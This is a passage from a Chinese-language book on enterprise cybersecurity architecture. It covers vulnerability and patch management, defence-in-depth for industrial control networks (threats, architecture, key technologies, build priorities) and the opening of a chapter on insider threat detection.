通过漏洞扫描工具开展资产漏洞扫描,通过情报源获取漏洞情报数据,评估漏洞影响程度与漏洞修复优先级,且情报源应为多源综合的漏洞情报,避免单一情报源的漏洞信息遗漏。 通过资产版本号匹配、漏洞特征扫描、系统配置项对比,搜索出与漏洞信息相匹配的资产,建立漏洞与资产的关联关系,为漏洞修复方案提供全面且准确的基础。 5.构建系统漏洞缓解体系 建设补丁管理系统,并进行全周期管理,针对当前环境存在的配置不符合项与漏洞设计修复方案,并在测试环境验证。该过程包括获取补丁、分析兼容性及影响、回滚计划、补丁测试、监控及验证等过程。 6.建设系统安全运行平台(参见图11.3上方“安全运行平台”部分) 聚合资产、配置、漏洞、补丁等数据,持续监控信息系统的资产状态,并进行多维度数据的碰撞分析和关联分析,以分析配置符合性、漏洞状态等信息,判定风险环节优先级等。通过资产信息与配置信息结合,分析出重要配置项的符合性结果、资产脆弱性以及重要补丁;通过资产与补丁信息结合,分析出补丁视角的风险暴露结果;通过将资产与漏洞数据结合,分析出漏洞视角的风险暴露结果。 7.与工单系统集成 建立与资产的所有者责任人、归属部门等相关联的漏洞修复或配置变更协同流程,并为IT运维人员提供脆弱性修复方案和操作手册,用于指导修复操作。修复方案应为“广义补丁”且具备多个选项可供企业选择,包括网络隔离、访问控制、安全产品白名单机制、系统加固等。 8.建立并管理例外处理清单(参见图11.3上方“整改修复与例外事项管理”部分) 对未能完成修复的漏洞以及无法整改的配置,应加入例外处理清单,并纳入风险管理,然后进行持续监测、关注,以免在后续的业务系统安全能力建设工作中出现同类的问题。 9.基于系统安全运行平台开展安全运行工作(参见图11.3右下方“服务运营”部分) 工作内容包括风险管理、资产安全配置管理、符合性评估、安全策略管理、漏洞管理、修复管理等。系统安全运行平台是以软件作为交付物的综合性系统,依托大数据架构,支持多数据源处理,从第三方系统内汲取资产与问题数据,通过数据预处理中心进行数据的清洗、富化、聚合,最终得出企业需要管理的资产与问题,然后依托工作编排架构,与第三方系统进行互操作,实现问题的处置闭环,以及资产的漏洞、配置、补丁的第三方验证。 综上所述,系统安全建设的核心目标是建设数据驱动的系统安全运行体系。通过系统安全大数据平台工具,聚合IT资产、配置、漏洞、补丁等数据,通过对多方数据实现两两关联分析,将系统安全防护从过去依靠自发自觉的模式提升到体系化支撑模式,实现及时、准确、可持续的系统安全防护。总体确保系统安全风险可控,保持良好的安全状况,为实战化安全运营提供支撑,实现系统级安全运行的闭环。 第12章 工业生产网安全防护 12.1 数字化转型与业务发展的新要求 12.1.1 工业联网带来新的安全挑战 工业控制系统(ICS)是工业生产网络的核心组成部分,由控制设备、传感执行设备、系统软件以及通信网络构成。典型的控制系统包括数据采集与监视控制系统(SCADA)、集散控制系统(DCS)、可编程逻辑控制器(PLC)等。工业控制系统广泛应用于能源电力、石油化工、装备制造、交通运输、食品医药、供水与污水处理等各行业,是工业生产网络的神经中枢,一旦遭受网络攻击,将造成不可估量的损失,轻则影响生产,重则导致环境破坏、人员伤亡,甚至危及社会稳定与国家安全。 长期以来,工业生产网络采用物理隔离、专用硬件、私有协议、定制软件等措施保障工业控制系统的安全性,但因此也带来技术升级缓慢、成本高居不下等问题。随着信息技术快速发展以及IT与OT的不断融合,通用协议、通用硬件和软件越来越多地应用于生产网络,对工业企业降本增效起到了显著的推动作用。近年来随着第四次工业革命的蓬勃兴起,工业数字化、网络化、智能化发展成为不可阻挡的潮流趋势,5G、工业互联网等新技术迅猛发展,为工业企业转型升级构建起新的基础设施,提供了强大的推动力。然而,安全隐患与技术革新相生相伴,工业生产网从封闭走向开放,设备联网,数据上云,工控设备、应用系统不可避免地与公共网络连接,生产数据高频度跨系统流动,给工业生产网络带来了前所未有的巨大安全风险。由此,工业生产网络的安全防护从过去的隐性话题升级成为工业企业关注的焦点问题。 12.1.2 工业生产网面临的安全形势 1.攻击频繁影响大,手段专业方法多 工业互联网安全涉及工业控制、互联网、信息安全3个交叉领域,面临传统网络安全和工业控制安全双重挑战。自从震网病毒被发现至今,针对工业控制系统进行破坏活动的网络攻击频发。 近年来,一系列针对工业控制系统的破坏性攻击被曝光,如2015年12月23日,乌克兰电力系统遭遇了大规模停电事件,数万“灾民”不得不在严寒中煎熬;2016年1月,CERT-UA通报称乌克兰基辅鲍里斯波尔机场遭受BlackEnergy攻击;2016年,BlackEnergy还对乌克兰境内的多个工业控制系统发动攻击,并且在2016年12月,造成乌克兰某电力企业的一次小规模停电事故。 2016年11月17日晚,沙特阿拉伯遭遇了Shamoon 2.0的攻击,包括该国民航总局在内的6个重要机构的计算机系统遭到严重破坏。Shamoon恶意程序首次现身于2012年8月,当时的攻击致使石油巨头Saudi Ameraco公司大约3万台计算机中的文件损毁。 事实上,乌克兰和沙特阿拉伯的工业控制系统遭到的攻击离我们并不遥远。因为即便是在全球范围内,能够提供工业控制系统信息化服务的供应商也并不多。其他国家工业控制系统出现的问题和漏洞,在国内的很多工业控制系统中也同样存在。 2.工业控制系统广暴露,安全漏洞难修补 工业控制系统在互联网上的暴露问题是工业互联网安全的一个基本问题。所谓“暴露”,是指我们可以通过互联网直接对某些与工业控制系统相关的工业组件,如工业控制设备、协议、软件、系统等,进行远程访问或查询。根据Positive Technologies研究数据显示,全球工业控制系统联网暴露组件总数量约为22.4万个。 同时,工业互联网系统,特别是底层的控制主机,由于系统老旧,常存在高危安全漏洞。根据中国国家信息安全漏洞共享平台(CNVD)最新统计,截至2019年12月,CNVD收录的与工业控制系统相关的漏洞高达2306个,2019年新增的工业控制系统漏洞数量达到413个,基本与2018年持平。工业控制系统漏洞数据居高不下,形势依然比较严峻。CNVD工控新增漏洞年度分布如图12.1所示。 图12.1 2000——2019年CNVD收录的新增工控系统漏洞数量 (资料来源:工业控制系统安全国家地方联合工程实验室) 漏洞在增多,且修复难度很大。通常情况下,修复过程必须保证不能中断正常生产,同时还必须保证漏洞修复后不会因兼容性问题影响正常生产。 工业控制系统操作站普遍采用商用PC和Windows操作系统的技术架构。任何一个版本的Windows操作系统自发布以来都在不停地发布漏洞补丁。为保证工业控制系统的可靠性,现场工程师通常不会对Windows平台打任何补丁,打过补丁的操作系统也很少会再经过工业控制系统原厂或自动化集成商进行测试,因此存在可靠性风险。但是,系统不打补丁就会存在被攻击者利用的安全漏洞,即使是普通的常见病毒也容易感染,从而可能造成Windows平台乃至控制网络的瘫痪。 黑客入侵和工业控制应用软件的自身漏洞通常出现在远程工业控制系统的应用上。另外,对于分布式的大型工业互联网,人们为了控制、监视的方便性,常常会开放VPN tunnel等方式的接入,甚至直接开放部分网络端口,这也给黑客的入侵带来了方便。 3.病毒木马不敢杀,应对策略受局限 基于Windows操作系统的个人计算机被广泛应用于工业互联网系统,因此易受病毒困扰。全球范围内,每年都会发生数次大规模的病毒爆发事件。 有些蠕虫病毒随着第三方补丁工具和安全软件的普及,近些年来几乎绝迹。但随着永恒之蓝、永恒之石等网络攻击武器的泄露,蠕虫病毒又重新获得了生存空间,其代表就是WannaCry病毒。出于对工业控制软件与杀毒软件兼容性的担心,操作站(HMI)中通常不安装杀毒软件,即使安装有防病毒产品,其基于病毒库查杀的机制在工业互联网领域中也有局限性。网络的隔离性和保证系统稳定性的要求导致病毒库升级总是滞后。因此,工业互联网系统每年都会暴发病毒,出现大量新增病毒。在操作站中,U盘等即插即用存储设备的随意使用,使病毒更容易传播。 针对工业互联网存在的安全问题,业界也早已提出了一些安全防护架构和管理策略,其中典型的代表是NIST SP800-82、IEC 62443等国际工业互联网领域指导性文献的纵深防御架构。 但是,上述原则在实践中经常遇到挑战,且存在局限性。例如,在工业互联网中,由于网络边界模糊,有时需要动态地在不同区域使用同一设备,会用到软件定义网络的高级功能,静态分区存在难度;虚拟区域边界部署防御,如防火墙、网闸、安全远程访问VPN等,这些设备或技术只能实现对部分已知规则的防御,进行及时动态更新的难度较大。 常见防御手段还包括在终端加入审计和应用程序白名单;运营过程中的防御则是进行漏洞扫描,并打补丁。但是,在工业互联网中,为保证可用性、稳定性,很难做到在线扫描或实时扫描,而且即使扫描到了漏洞,企业也可能会因为担心系统的可用性和稳定性被破坏,而最终选择放弃补丁升级。此外,在工业控制系统中,也确实有大量的漏洞难以找到合适的升级补丁。 因此,工业互联网实际上需要建立一种能够跨越物理世界(包括直接可观测性)、网络世界(包括保留数据的使用权)和商业世界(包括产权和订立合同的权利)的一体化安全手段,并且可以对攻击进行追踪和溯源。 12.1.3 传统安全防护机制不适用于工业生产网 工业生产网络在技术标准遵循、功能优先设定、安全管理目标等多方面与传统IT网络存在显著差异,因此不能照搬传统网络安全防护方案,必须根据工业生产的特点采用新的安全框架和防护措施。工业企业中常见的安全措施包括安装通用杀毒软件、通过双网卡隔离信息网与控制网、部署通用防火墙来防范网络攻击等,这些安全措施无法应对日益复杂的工业网络威胁,存在的主要问题如下。 ● 传统杀毒软件不适用于工业主机安全防护 工业主机是工业网络的高危攻击点,在生产优先、专机专用、够用即可等原则下,工业主机普遍存在硬件低配、系统老旧、不打补丁、软件定制等工业领域特有的问题,通用杀毒软件很难适配,实践中发生过多起工业软件被误杀的案例,因而许多工业主机宁愿“带病运行”,也不安装杀毒软件。 ● 传统防火墙不适用于工业网络边界防护 传统的防火墙、网闸等网关设备,在工业环境中面临两大挑战:硬件设计不适应工业现场DIN导轨安装方式(一种工业标准,元件设备可方便地卡在导轨上而无须用螺丝固定;方便维护)和高温、高湿、粉尘以及酸碱环境;不能识别工控协议,只能设置粗粒度的安全策略,甚至采取流量全部放过的策略,安全策略形同虚设。 ● 传统审计系统不适用于工业网络监测预警 由于传统的网络审计设备不能识别工控资产,不了解工控系统漏洞,对于针对工控系统的攻击行为、异常操作都无法识别,无法提供有价值的工业安全审计与异常报警。 ● IT安全措施在OT领域几乎无效 较多工业企业在OT设置中使用IT安全措施,但没有考虑其对OT的影响。例如,国内某汽车企业的IT安全团队按照IT安全要求主动扫描OT网络,结果导致汽车生产线PLC出现故障,引起停产。 从实践来看,较多工业企业基本不进行OT安全评估,即使进行OT安全评估,也是由IT安全服务商执行。而IT安全评估通常不包括OT网络的过程层和控制层,即使对这两层进行评估,也只能采用问卷方式,不能使用自动化工具。再就是,执行这些评估的人员通常是IT安全专家,对OT领域也不甚了解。 12.2 什么是工业生产网安全防护 12.2.1 基本概念 1.工业生产网 工业生产网的范围伴随生产自动化、信息化的发展不断扩展,早期的生产网通常指狭义的工业控制系统及其通信网络,但随着产业水平不断提高,生产管理与经营分析需要及时获取生产过程数据,以及对生产过程进行控制管理,因此控制网络需要与企业管理网络联通以便交换数据,与生产过程相关的管理系统(如MES)、数据库服务器也纳入到工业生产网范畴。在实践中,工业生产网已形成了广获共识的层次结构模型,按功能分为5个层级,依次为企业资源层、生产管理层、过程监控层、现场控制层和现场设备层,如图12.2所示。 图12.2 工业生产网分层模型 ● 企业资源层主要包括ERP系统功能单元,用于为企业提供决策运行手段。 ● 生产管理层主要包括MES系统,用于对生产过程进行管理,如制造数据管理、生产调度管理等。 ● 过程监控层主要包括监控服务器与HMI系统功能单元,用于对生产过程数据进行采集与监控,并利用HMI系统实现人机交互。 ● 现场控制层主要包括各类控制器单元,如PLC、DCS控制单元等,用于对各执行设备进行控制。 ● 现场设备层主要包括各类过程传感设备与执行设备单元,用于对生产过程进行感知与操作。 随着工业互联网的发展,工业生产网的范围得到进一步扩展,工业互联网通过人、机、料、法、环[2]的全面互联,实现工业生产全要素、全产业链、全价值链的连接,推动新一代信息通信技术与工业经济深度融合。传统的游离于生产过程之外的企业经营活动,比如客户需求分析、产品设计改进、合作伙伴协同、市场营销拓展等,也与生产管理与过程控制紧密地联系起来。与此相适应,生产网在网络结构和技术形态上也将发生重大变化,5G和TSN(时间敏感网络)技术将逐步替代现有庞杂的工业总线和WiFi网络,生产过程的实时监控与反馈控制将推动企业建设边缘计算中心,生产大数据的分析处理将优先在边缘云处理,经过协议转换和归一处理的汇总数据再上传至工业互联网平台。在工业互联网新场景下,传统生产网与企业边缘计算中心将构成工业生产网的新形态。 2.工业生产网安全防护 工业生产网的安全可以从工业生产和网络连接两个视角分析。从工业生产视角看,安全的重点是保护智能化生产的连续性、可靠性,关注智能装备、工业控制设备及应用系统的安全;从网络连接视角看,安全主要保障个性化定制、网络化协同以及服务化延伸等边缘云计算的安全运行,防止重要数据泄露,保护工业App安全,并提供持续的服务能力。 相较于传统工控网络,新型工业生产网在防护场景和安全危害程度上都有明显的差异。 ● 防护对象范围更大,安全场景更丰富 包含设备安全(工业智能装备及系统)、控制安全(SCADA、DCS等)、工业网络安全(工厂内、外网络)、应用安全(边缘计算云平台、工业软件及工业App等)以及数据安全(工业生产、平台承载业务及用户个人信息等数据)。 ● 网络安全和生产安全交织,安全事件危害更严重 工业控制网遭受攻击,将影响具体生产环节、生产流程的正常运行,而作为工业生产网大脑的边缘计算中心,一旦遭受攻击,除了信息泄露或数据篡改,还将引起大范围服务中断,使整个工厂的生产与经营陷入瘫痪。 12.2.2 设计思想 ● 贴合工业生产业务逻辑,实施内生安全策略 工业生产的网络安全风险来自生产过程的脆弱性,如工控系统漏洞、工艺过程缺乏安全设计等,因此实施安全防护策略时,必须充分考虑生产逻辑和要求,准确理解工控协议中具体指令的含义。此外,工业生产的中断与重启成本非常高,不能为了过度追求安全性而影响稳定性与连续性。这要求产品的设计与策略的实施要充分考虑内生安全模式,把安全能力与业务过程融合起来,如硬件对环境的适配性、安全功能与工业软件的兼容性、极端情况下的安全逃生能力。 ● 静态特征匹配与动态智能识别相结合的防护机制 相较于传统工控网络,新型工业生产网由于网络更开放,应用更复杂,传统静态的、基于特征匹配的防护机制已经不能有效应对新的挑战,必须增加动态的、基于行为识别的防御措施。工业生产的模型相对固定,机器与机器之间通信的频率、数据、流量可以通过大数据分析进行建模,任何偏离模型基线的行为都可能意味着网络攻击。工业安全产品具备基线建模和行为识别能力,能够发现网络攻击与工艺操作异常,及时进行报警处置。 12.2.3 总体架构 图12.3所示为一个典型的大型工业企业网络架构图,涵盖多个安全防护场景,主要包括工业控制网络、集团数据中心(边缘计算)和卫星通信网,每个区域内部以及区域边界都有多个安全策略实施点。 1.工业控制网络 即传统的生产控制网络,一般分布在大型集团企业的二级或三级单位,执行具体的生产任务。 图12.3 大型企业工业生产网安全建设框架 ● 工业控制网划分与连接 一个合理规划的控制网通常采用分层结构,现场设备、过程控制、生产管理分布在不同的层级。现场控制设备通过工业总线彼此连通,控制设备与过程控制服务器通过工业以太网通信,过程控制层通过标准以太网与生产管理网交换数据,生产管理网通过专线连接集团总部,实现生产数据在集团层面的汇总管理。 ● 控制网内部安全防护 在控制网内部,所有工业主机和服务器安装安全防护软件,保护设备免受病毒攻击,网络不同层级之间部署工业防火墙(有些场景需要工业网闸)进行隔离防护,在流量汇聚点部署工业检测审计设备,实时检测网络入侵与异常操作,构成控制网内部的纵深防御体系。 ● 控制网边界防护 在控制网与办公网边界部署防火墙,防止办公网病毒或其他攻击流量进入控制网;对于远程数据采集、远程维护接入的场景,需要在控制网接入区实施身份认证、行为审计等安全策略;对于安全等级较高的业务,数据需要加密传输。 2.集团数据中心 随着工业互联网、5G、AI等新技术的发展,大型企业数据中心的技术架构逐渐向虚拟化、云化方向演进,除传统经营管理系统(如ERP、CRM)集中部署在集团总部数据中心外,一些生产过程管理系统、新型的工业App应用也逐渐迁移到集团数据中心,如MES系统、质量检测实时分析系统、AGV智能导航系统,由此构建起以边缘计算为中心的工业互联网企业侧计算环境。工业生产数据在边缘服务器完成采集汇聚、协议转换、本地处理后,再统一上传至工业互联网平台。 数据中心是部署集团级工业安全态势感知平台的首选环境。态势感知平台汇总所有下属企业工控网络的流量数据与安全日志,自动识别工控资产类型与漏洞分布,统一分析威胁告警事件与安全风险,以大屏方式直观呈现全网工控安全态势与发展趋势,为工业安全风险应对与应急响应提供决策支撑。 3.卫星通信网 对于远离城乡且通信网络覆盖差的野外作业环境,如石油勘探、水利建设、远洋航行,企业一般通过卫星通信网实现数据传输。VSAT(Very Small Aperture Terminal,甚小孔径终端,意译为“甚小天线地球站”,简称“小站”)小站组网是一种常见的卫星通信应用方式,具有灵活可靠、成本低、使用方便等特点,得到了广泛应用。小站通过卫星与企业的主站(中心站,即卫星地面站)建立连接,可把作业环境与生产数据及时传送至企业总部,并从总部接收管理指令。 小站对外接入卫星链路,对内连接本地生产网络。根据业务复杂程度不同,生产网可以是完整的分层控制网,也可以是以现场设备和过程控制为核心的简化网络,其面临的网络安全风险与前述工业控制网络相似,所采用的安全防护措施也基本一致。 卫星地面站是企业的卫星主站,汇总接收多个小站的数据,统一接入企业总部网络。在接入区需要实施身份认证、访问控制、行为审计等安全策略,对于安全等级较高的业务,数据应进行加解密处理。 12.2.4 关键技术 工业生产网防护场景复杂,设备与协议多样,涉及多项网络安全关键技术,组合成不同产品,共同构成一张完整的防护网,识别和抵御安全威胁,化解各种安全风险,构建工业生产网的安全可信环境,保障工业生产稳定运行。 ● 工业主机白名单控制 工业主机由于长期不间断运行,不能及时打补丁,并且受到联网条件的限制,无法实时更新病毒库,因此传统杀毒机制不适用于工业主机。比较有效的方式是采用白名单控制技术,对工业软件相关的进程文件进行扫描识别,为每个可信文件生成唯一的特征码,特征码的集合构成特征库,即白名单。只有白名单内的软件才可以运行,其他进程都被阻止,以防止病毒、木马、违规软件的攻击。 ● 工控协议识别与控制 为了保障数据传输的可靠性与实时性,工业生产网已发展了多套成熟的通信协议,主流的有几十种,大致分为工业总线协议和工业以太网协议两大类,如Modbus、S7、OPC、Profinet、IEC104等。工控协议的识别能力是安全设备工作的基础,也是评价产品能力的重要指标。 ● 工控漏洞利用识别与防护 工控系统漏洞是工控网络安全问题的主要来源。由于工控设备很少升级或者不升级,因此普遍存在可被攻击的漏洞,而由于技术的专业性和封闭性,这些漏洞很容易被作为0day利用。因此工控安全产品对工控漏洞利用行为的识别能力,以及相应的防护能力,是工控安全防护能力建设的核心。 ● 工控网络流量采集与分析 获取网络流量是发现网络攻击的前提,流量采集与分析广泛应用于网络安全方案,是一项比较成熟的技术。对于工控网络,除了基本的流量识别与统计分析外,还需要理解生产过程的操作功能码,根据业务逻辑判断是否发生异常。此外,根据设备间通信的规律建立流量基线模型,对多源数据进行关联分析,能够有效地识别异常行为和网络攻击。 ● 工业网络安全态势感知 态势感知是安全防御的重要手段,对于工控网络,通过安全态势感知平台,可以直观地了解网络中的资产分布、漏洞分布、网络攻击事件,对网络的整体风险水平进行量化评估。态势感知平台需要多种核心能力支持,包括完善的数据获取能力、大数据分析与建模能力、网络攻击溯源分析能力、安全事件闭环处理能力等,是工控网络安全防护的核心产品。 12.3 工业生产网安全防护建设要点 12.3.1 关键建设点 工业生产网络安全涵盖多个场景,需要综合防护。整体上,在工控网络内部合理划分安全区域,构建工控主机安全防护体系,建设工控网络安全监测系统,建立安全纵深防御体系。 在工控网络与IT网络边界设置网络隔离与访问控制点,过滤来自IT网的非法访问;对于远程数据采集和远程运维操作,建立身份认证与加密机制,进行行为审计和威胁监测。 在总部数据中心设置工业互联网数据交换安全接入区,实施身份认证与数据完整性控制措施,保障数据传输的安全;在集团总部数据中心建设工业安全态势感知平台,全面掌握工业生产网的安全态势。 此外,在总部建设工控安全仿真验证平台,对安全防护方案进行可行性研究以及充分测试验证。具体来讲,网络安全保障体系规划可以梳理成九大重点任务,工业企业可以结合自身的业务特点,将其作为工业网络安全体系规划的参考。 ● 调整优化工控网络架构 合理划分网络区域,建立进出工业控制生产网的安全控制点。在控制网与IT网之间进行安全逻辑隔离或者单向物理隔离;建立控制网与IT网之间可控的应用与数据交换区(视业务特点与数据重要程度);在控制网内进行无线局域网(WLAN)安全组网与严格访问权限控制;对现场控制设备与非现场控制设备分离组网,通过独立管理区进行现场设备的控制管理(视网络规模与管理复杂度而定)。 ● 建立工控网络纵深防御体系 对进出控制网的网络流量进行白名单控制,部署威胁检测、行为监测、访问控制以及安全审计设备,阻挡外网与控制网络的不安全通信。完整审计通信记录,实现对控制系统的安全防护与异常追溯。 ● 加强工控主机安全防护 对工程师站、操作站(HMI)、SCADA服务器、MES服务器、实时数据库服务器等工业主机实施病毒查杀、白名单管控、系统加固、U盘与外设管控等安全措施,确保工业主机与服务器设备的稳定运行。 ● 建设工控网络远程访问安全接入点 在安全接入点对进出控制网的流量进行身份认证、数据加解密、访问控制以及威胁检测。若远端设备通过有线或无线拨号连接控制网,则建立VPN隧道,实现对远程运维接入和远程终端单元(RTU)数据传输的风险控制。 ● 建设工业互联网安全接入点 在接入点对企业网与工业互联网平台之间的流量进行身份认证、数据加密、访问控制以及威胁检测。控制网内通过无线(WLAN、4G/5G)发送的数据,则统一导流至边缘计算安全网关,保障联网的工业设备、工业应用免受互联网威胁,保障工业数据的安全传输与使用。 ● 建立工控网络安全监测体系 在控制网部署工业安全流量探针、日志探针,实时监测网络攻击行为,采集设备安全日志,获取工控资产、系统漏洞信息,监测非法设备接入(如非受控U盘、第三方运维设备)以及控制网设备非法外联。所有监测数据汇总至工业安全态势感知平台,实现工控网络安全可视,满足法律合规要求。 ● 建设工业安全态势感知平台 采集工控网络的资产、漏洞、威胁、行为等数据,统一汇总至工业安全态势感知平台集中分析,并进行可视化呈现,实现对控制网的整体安全监控;对工业互联网安全态势监管平台开放接口,实现与行业监管机构的事件通报和处置联动。 ● 建立边缘计算云平台安全防护体系 在边缘计算中心搭建可持续运营的弹性的云安全管理与服务平台,覆盖云外南北向访问控制、云内东西向访问控制、主机防护、漏洞管理、Web安全防护以及流量与行为审计,通过虚拟安全资源池的方式为不同应用按需提供安全防护能力。在云平台部署零信任身份认证管理系统,严格控制用户访问云平台应用权限;部署数据泄露防护系统,保护工业大数据安全。 ● 建设工控安全仿真验证平台 按照生产场景等比例搭建仿真环境,模拟实际生产控制过程,对工控网络安全进行全面渗透评估,对安全防护方案进行可行性研究与充分测试验证。除了评估现网系统的安全,仿真平台还可以进行核心控制设备(PLC、DCS)的可靠性研究,以及工艺安全研究。 12.3.2 安全能力需要长期积累 工业生产网本身的技术复杂度、面临的安全威胁的多样性,以及安全事件造成的危害都对工业企业提出了非常高的安全能力要求。安全保障体系建设本质上是安全能力的建设,全面、系统、有效的安全能力是安全保障体系建设的基础。对于大多数工业企业来说,安全能力的建设绝非一日之功,需要长期建设和积累,需要与信息化业务系统同步规划、同步建设、同步运营,并在运营过程中不断优化完善。 最后,除网络安全技术保障措施外,工业网络安全管理制度、安全意识的提升、工业网络安全人才队伍的建设等,都是不可或缺的规划建设内容。“人是安全的尺度”,大量的安全事件是由人的因素造成的,问题的解决最终也离不开人的参与。工业企业在网络安全保障体系的建设过程中,需要重视既懂工业自动化又懂网络安全的复合型安全人才队伍的建设和培养。 第13章 内部威胁防护体系 13.1 数字化转型与业务发展的新要求 13.1.1 数字化转型扩大了内部威胁的范围 2012年,美国国土安全部计算机紧急事务响应小组(US-CERT)提出了针对内部威胁的完整定义,业内对内部威胁有了相对统一的认知。US-CERT指出,内部威胁攻击者一般是指企业或组织的员工(在职或离职)、承包商以及商业伙伴等,他们具有企业或组织的系统、网络以及数据的访问权;内部威胁就是内部威胁攻击者利用合法获得的访问权对企业或组织信息系统中信息的机密性、完整性以及可用性造成负面影响的行为。 US-CERT的定义明确了内部威胁的主体、客体和结果。主体除了传统意义上的内部员工,还包括离职员工、承包商和商业伙伴,而且内部人具有相关的系统权限。客体是信息系统。结果是针对信息的负面影响,负面影响涉及机密性(如信息泄露)、完整性(如数据篡改)和可用性(如系统攻击)。 随着业务与信息化的发展,信息系统已经成为企业和组织的核心资产。数字化转型在提升生产效率和业务便利性的同时,也扩展了可接触到核心资产的用户数量和范围,由此带来了更多的内部威胁。 13.1.2 内部威胁攻击越来越频繁 内部威胁在信息安全领域一直存在。随着数字化转型和业务的发展,内部威胁呈现出不断增长和发展变化的形势。如Cybersecurity Insider发布的《2019年内部威胁报告》中指出,绝大多数(70%)组织观察到,在过去12个月中,内部攻击越来越频繁。根据内部威胁产生的动机,大致可以将内部威胁分为主观恶意和非主观恶意两大类。 产生主观恶意行为的原因有很多,监守自盗、内外勾结、挟私报复、发泄不满、心理变态等因素都有可能引发该行为。通常将这样的人形象地比喻为企业的“内鬼”。例如,2020年年初,国内某知名大型互联网公司的一个供应商的开发人员,因与公司发生矛盾,竟然在后台恶意删除了大量用户数据,直接导致该互联网公司上千万用户的相关服务被中断。Verizon发布的《2020年数据泄露调查报告》中指出,有35%的金融和保险机构发生的数据泄露或攻击行为有“内鬼”参与。Securonix公司发布的《2020年内部威胁报告》中指出,计划离职的员工中,超过80%的人可能随身带走一些敏感的信息,这些人士涉及60% 的内部网络安全和数据泄露事件,他们往往会在离开之前的2~8周开始窃取数据。 非主观恶意行为,通常可以理解为内部员工违反管理规定或安全规范的行为,简单地说就是违规。这些行为绝大多数都是无意的,即使是有意的,通常也不是主观恶意的,而是没有意识到自己的行为可能会给单位带来网络安全风险。虽然表面看起来,内鬼的直接危害比较大,但内鬼的发生几率相对较低;而违规行为则几乎是时时刻刻都在发生,其实际危害往往还会大于内鬼。比如,在2017年5月爆发的WannaCry病毒事件中,很多机构的系统被病毒入侵,就是因为员工违规在内网中私搭乱建了WiFi热点。再比如,不小心写错了邮件收件人;把自己的密码告诉了同事;把不安全的U盘插入了内网设备等这些不起眼的小事,其实都是违规行为。类似事件经常会给政企机构带来巨大的风险和损失。 13.1.3 传统网络安全防护体系的问题 传统的网络安全防护体系注重安全边界的保护,容易忽视内部威胁的防护。传统的网络安全防护手段更多基于单点的监测和防护,对于风险场景更复杂、与业务关系更紧密的内部威胁来说,安全能力非常有限。 传统的网络安全防护体系在面对内部威胁时,所暴露出的问题主要是由内部威胁的特点决定的。与外部威胁相比,内部威胁具有以下特点。 ● 危害和损失更严重 由于内部人对组织结构、业务系统和相关知识更加了解,更容易获取系统权限,更容易接触到核心资产,更容易摆脱安全体系的防护,因此使得内部威胁造成的损失和危害更严重。美国CSI(Computer Security Institute,计算机安全协会)与美国FBI(Federal Bureau of Investigation,联邦调查局)早在2008年,就在《计算机犯罪和安全调查》中对信息安全事件的来源进行了统计,发现内部安全事件所造成的损失明显要高于外部事件。 ● 检测和防护更困难 ▷ 缺乏可见性 内部威胁来自组织内部,与外部威胁需要面对网络安全边界的层层防护不同,由于内部防护手段薄弱,内部威胁攻击者对于传统边界安全设备具有天然的透明性,相当于进入一个自由的世界随意发挥自己的破坏能力。 由于不便部署传统检测手段,业务向云的迁移使内部攻击的检测更加困难。大数据和数据集中使获取敏感信息的成本大幅降低。数据共享应用的增多使数据更容易离开传统安全边界。 ▷ 检测难度大 内部威胁攻击者(包括在职/离职员工、供应商和商业伙伴等)拥有内部信息系统的访问权限,恶意行为往往隐藏于正常业务行为中。恶意行为的发现变得更加困难,只能在事件发生后,进行有限的审计溯源工作。 ▷ 容易受组织壁垒干扰 安全培训和人员管理是内部威胁管理的重要一环。由于安全管理是跨部门甚至跨组织的活动,安全管理者缺乏有效的手段促进不同部门、不同组织间的协同协作。内部威胁的管控力度容易被削弱。 13.2 什么是内部威胁防护体系 13.2.1 基本概念 内部威胁防护体系是基于内部威胁的特征和企业(或组织)自身特点,针对内部威胁构建的安全管控体系。内部威胁防护体系包括:作为体系核心的内部威胁感知平台;作为数据源的业务系统、信息系统和网络安全系统;作为管理手段的信息安全组织和管控制度。 13.2.2 设计思想 通过研究大量内部威胁事件,可梳理出内部威胁的发生基本都遵循一个模型,即人、触发条件、行为、目标、结果的行为模型(见图13.1)。人的要素中,一般会涉及心理因素、职位因素等特定要素,使之成为潜在的内部威胁攻击者。触发条件往往是一个事件,比如离职、降薪、矛盾、经济诱惑等;触发条件使内部人从潜在内部威胁攻击者变为有动机的内部威胁攻击者。行为元素即条件触发后,攻击者在现实和虚拟环境中一定会表现出针对信息系统或信息资产的偏离正常行为基线的举动。目标元素即行为元素作用的客体,往往包括数据、信息系统等各类信息化环境中的对象。结果元素则是异常行为导致信息系统或信息资产造成的负面影响,涉及机密性(如信息泄露)、完整性(如数据篡改)和可用性(如系统攻击)。 图13.1 内部威胁行为模型 内部威胁感知平台的核心是结合内部威胁的行为模型和风险场景,通过技术手段建立内部威胁检测模型。内部威胁感知平台基于人的要素,结合日志数据和个人信息,分析人员的潜在风险。如特权账号用户的泄密风险高于普通用户,考勤异常表示可能存在离职风险。平台通过异常行为模型和算法进行内部威胁风险监测,并基于事件持续评估内部人员风险。系统基于历史事件总结和业务梳理,针对内部欺诈、权限滥用、数据窃取、意外泄露、系统破坏等内部威胁类型建立场景化的异常行为分析模型;结合身份安全系统和业务特点对特权用户、合作伙伴、普通员工等不同风险等级的内部人员,制定有针对性的分析策略,形成更准确、有效的风险分析和识别能力,以期能够更准确、更快速地发现内部威胁攻击事件。 13.2.3 总体架构 内部威胁防护体系以内部威胁感知平台为核心,通过收集应用系统中的管理日志和业务行为日志、IT系统中的系统日志、网络边界的DLP数据、身份安全系统中的用户信息/权限数据/特权账号数据、态势感知平台的数据安全和终端安全等数据,结合场景、模型、策略的分析,实现用户行为检测、风险用户管理、风险事件管理、异常告警管理、安全事件追溯,并且可以将内部威胁告警反馈回态势感知平台,如图13.2所示。 图13.2 内部威胁防护体系总体架构 13.2.4 关键技术 1.用户和实体行为分析(UEBA)技术 UBA(用户行为分析)由Gartner于2014年首次提出并将其定义为一类网络安全工具,用于分析网络空间中的用户行为,并应用高级分析技术来检测异常恶意行为。2015年,Gartner将其定义更新,增加了“E”,变为UEBA(用户和实体行为分析),增加除用户外的实体(如路由器、服务器和端点)的行为分析。UEBA较UBA功能更强大,它可以分析包括用户、IT设备和IP地址等在内的行为,从而实现对复杂攻击行为的检测。 